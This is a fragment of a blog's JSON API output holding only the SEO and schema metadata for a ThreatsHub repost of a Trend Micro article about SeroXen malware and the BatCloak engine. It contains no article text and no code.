class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"SeroXen Incorporates Latest BatCloak Engine Iteration\",\"datePublished\":\"2023-06-15T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\"},\"wordCount\":2092,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"keywords\":[\"Trend Micro Research : APT&Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : IoT\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Phishing\",\"Trend Micro Research : Privacy&Risks\",\"Trend Micro Research : Spam\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\",\"name\":\"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"datePublished\":\"2023-06-15T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"width\":1397,\"height\":1167},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"SeroXen Incorporates Latest BatCloak Engine Iteration\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","og_locale":"en_US","og_type":"article","og_title":"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-06-15T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"SeroXen Incorporates Latest BatCloak Engine Iteration","datePublished":"2023-06-15T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/"},"wordCount":2092,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","keywords":["Trend Micro Research : APT&Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : IoT","Trend Micro Research : Malware","Trend Micro Research : Phishing","Trend Micro Research : Privacy&Risks","Trend Micro Research : Spam"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","url":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","name":"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","datePublished":"2023-06-15T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","width":1397,"height":1167},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"SeroXen Incorporates Latest BatCloak Engine Iteration"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52352","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=52352"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52352\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/52353"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=52352"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=52352"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=52352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![](\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\")